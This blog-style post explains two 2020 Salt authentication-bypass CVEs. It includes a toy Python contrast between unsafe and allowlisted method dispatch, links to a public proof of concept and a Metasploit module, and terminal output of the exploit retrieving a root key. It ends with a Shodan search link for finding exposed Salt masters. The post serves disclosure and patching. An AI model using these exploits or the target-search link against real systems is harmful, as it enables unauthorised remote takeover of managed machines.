Hacking Salt Stack 2020

Hacking Salt Stack

Today's exploit covers two CVEs affecting the popular DevOps tool Salt.
Salt is a tool that system administrators use to manage and carry out tasks on many computers,
such as upgrading a large set of machines. Thanks to its ease of use and the wide
variety of supported platforms, the tool has grown a bigger and bigger user base and even has a
yearly conference called SaltConf (https://saltconf.com/).
Two new vulnerabilities were found that were so serious that even Salt has
a notice on its main page advising people to patch
their Salt instances.

CVE-2020-11651

ClearFuncs, the part responsible for handling
authentication and key exchange between a Salt server
and client, does not validate authentication when its methods and functions are called.
This allows a malicious third party to use functions without any authentication,
which could be used to run malicious commands on clients.

Check out ClearFuncs on GitHub:
https://github.com/saltstack/salt/blob/master/salt/master.py#L1993
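
The class of bug described above, as an added example that is not Salt's code and not from the original post: a request handler that resolves a peer-supplied method name with no restriction, next to a form that only dispatches to an explicit allowlist. The names ToyClearFuncs, _internal_auth_info, expose_methods and both dispatch functions are hypothetical, and the key is a constructed sample value.

```python
# Added illustration. All names here are hypothetical; this is not Salt's code.


class ToyClearFuncs:
    """Toy stand-in for a handler that serves requests before authentication."""

    # Hardened pattern: only names listed here may be called from the wire.
    expose_methods = ("ping",)

    def __init__(self, root_key):
        self._root_key = root_key

    def ping(self, load):
        return {"pong": True}

    def _internal_auth_info(self, load):
        # Internal helper that was never meant to be reachable by a remote peer.
        return {"root_key": self._root_key}


def dispatch_vulnerable(handler, payload):
    """Weak pattern: the peer-supplied 'cmd' string selects any attribute."""
    return getattr(handler, payload["cmd"])(payload)


def dispatch_hardened(handler, payload):
    """Hardened pattern: refuse anything outside the explicit allowlist."""
    cmd = payload.get("cmd")
    if not isinstance(cmd, str) or cmd not in handler.expose_methods:
        raise PermissionError("method not exposed: %r" % (cmd,))
    return getattr(handler, cmd)(payload)


def demo():
    handler = ToyClearFuncs(root_key="CONSTRUCTED-SAMPLE-KEY")
    request = {"cmd": "_internal_auth_info"}  # constructed unauthenticated request
    leaked = dispatch_vulnerable(handler, request)
    try:
        dispatch_hardened(handler, request)
        blocked = False
    except PermissionError:
        blocked = True
    # A legitimately exposed method still works through the hardened path.
    return leaked, blocked, dispatch_hardened(handler, {"cmd": "ping"})


if __name__ == "__main__":
    print(demo())
```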

CVE-2020-11652

ClearFuncs allows arbitrary access to methods that can give
an unauthenticated user access to system directories.

Exploiting

Metasploit (“metasploit-framework/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb”) was quick to add
a module that exploits these vulnerabilities.

https://github.com/jasperla/CVE-2020-11651-poc

root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Salt version: 3000.1
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (ip:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651...
[*] root key obtained: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
root@kalimah:~/salt#

Find salt hosts:

https://www.shodan.io/search?query=Salt-master

https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
https://vulns.firosolutions.com/view/platform/salt/
https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
https://pypi.org/project/salt
https://en.wikipedia.org/wiki/Salt_(software)